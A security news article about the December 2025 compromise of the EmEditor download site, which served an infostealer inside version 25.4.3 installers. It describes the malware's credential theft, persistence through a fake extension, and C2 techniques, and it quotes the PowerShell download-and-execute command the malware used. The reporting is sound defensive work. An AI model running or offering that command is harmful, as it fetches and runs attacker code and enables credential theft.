A major supply chain attack targeting EmEditor, a widely used text editor software, has exposed millions of users to sophisticated infostealer malware. <\/p>\n
Between December 19 and December 22, 2025, the official EmEditor website fell victim to unauthorized modification, serving compromised installer files to unsuspecting users during a critical four-day window. <\/p>\n
The company confirmed that users who downloaded version 25.4.3 through the Download Now button received malicious files instead of legitimate software, creating a significant security breach<\/a> affecting developers, system administrators, and technical professionals worldwide.<\/p>\n The attack exploited the redirect mechanism controlling EmEditor\u2019s download pathway. Attackers altered the URL settings that normally directed users to legitimate installation files, instead pointing them to a malicious version hosted on EmEditor\u2019s WordPress content directory. <\/p>\n The compromised installer was digitally signed by \u201cWALSHAM INVESTMENTS LIMITED,\u201d a non-official organization, rather than Emurasoft Inc., the software\u2019s legitimate creator. <\/p>\n This spoofed signature added a deceptive layer of authenticity that many users might not have questioned.<\/p>\n Qianxin analysts identified<\/a> the malware after careful forensic examination, revealing a comprehensive information-stealing payload embedded within the installation package. <\/p>\n The malicious code demonstrated a sophisticated design that mirrors legitimate EmEditor functionality, allowing it to operate silently during and after installation while collecting sensitive user data.<\/p>\n The malware\u2019s infection mechanism operates through an embedded VBScript that executes a PowerShell command: powershell.exe \u201cirm emeditorjp.com | iex\u201d. <\/p>\n This command downloads and immediately executes additional malicious code directly in system memory, bypassing traditional file-based detection methods. <\/p>\n The payload steals credentials from web browsers<\/a>, including Chrome, Edge, Brave, and Opera, capturing cookies, login data, and browsing history. <\/p>\n It also targets credentials from productivity applications such as Discord, Slack, Zoom, Microsoft Teams, WinSCP, and PuTTY, creating a severe risk for enterprise users managing sensitive communications and infrastructure access.<\/p>\n The malware<\/a> employs persistence tactics through a malicious browser extension named \u201cGoogle Drive Caching,\u201d which maintains unauthorized access even after the initial infection. <\/p>\n This extension contains Domain Generation Algorithm capabilities, allowing the attackers to establish resilient command-and-control communications across multiple dynamically generated domains. <\/p>\n The extension can steal Facebook advertising<\/a> account credentials, monitor clipboard activities for cryptocurrency address replacement attacks, and execute remote commands to extract additional data or manipulate browser behavior. <\/p>\n Victims are advised to disconnect affected systems immediately, perform comprehensive malware scans, and reset all credentials used on compromised devices.<\/p>\n Follow us on\u00a0Google News<\/a>,\u00a0LinkedIn<\/a>,\u00a0and\u00a0X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0Set CSN as a Preferred Source in\u00a0Google<\/a>.<\/strong><\/p>\n The post EmEditor Editor Website Hacked to Deliver Infostealer Malware in Supply Chain Attack<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\n![\"EmEditor](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgPu15hxE7E1DO-XSO08mG1zEVRkUtCjSERBINEh4E1c1gcUiRPY9D85keXemg-93my9zsHc5gxDL8KrgNrzBwyf2KxEgbouIXF78G3zprT0rbgIBBoRSSQqPmEOJIACxJvE2uGvsK5ioYwB83JZdwM9eARAAtB0r_2e6mIN5AUiA0dDhQ1lXHiA3Fr2UE\/s16000\/EmEditor%2520Editor%2520%28Source%2520-%2520Qianxin%29.webp?ssl=1\")
![\"PowerShell](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhX2WjvjtQ5l2PkGPtR9UYRUB13pJT4toodqqEEilyx069RrrWUivjnx64EH8g31XBrGfM9xOIQecVv87UP_39QXBE-vP90F-cl7DB_ulqlZbqyWtNN6a7zNY95m9rT2B20IlAk-_qYDLQTINdbqwPnRsG0Vwn9VCYYof9xe3tGmOBZinbjocxHXOUZVQs\/s16000\/PowerShell%2520%28Source%2520-%2520Qianxin%29.webp?ssl=1\")
Infection mechanism<\/strong><\/h2>\n
![\"Google](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjiKM1KZTeX8KVFfx30xHkOQ5H3yAlYxNM0lcgYXd9h1dRViBaW41jxBnEYRw1iMI2qOmmBZknW1bZdsDuwo515mydtR5g8unRiMGDf5EVpaHIYJc-nQuplyp7594dTBsLJIGsAa4xRlsCy3Fa4sYCSpFdbkWblLBa2HhEwueb4vTHvco0ry6AypxvI2Y0\/s16000\/Google%2520Drive%2520Caching%2520%28Source%2520-%2520Qianxin%29.webp?ssl=1\")